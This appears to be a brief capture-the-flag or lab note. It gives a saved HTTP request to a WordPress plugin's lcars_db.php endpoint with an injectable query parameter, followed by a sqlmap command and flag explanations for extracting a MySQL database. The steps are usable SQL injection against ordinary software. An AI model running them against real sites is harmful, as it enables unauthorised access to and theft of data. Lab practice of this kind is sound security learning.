GET /wp-content/plugins/lcars/lcars_db.php?query=1 HTTP/1.1
Host: 10.10.10.61
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: 14cd8f365a67fad648754407628a1809=603861d55eed1723ec7b8876a1ab112a
Upgrade-Insecure-Requests: 1

run: 
sqlmap -r query.req --dbms mysql

-r == the request 
--dbms == setting to mysql based on the files from lcars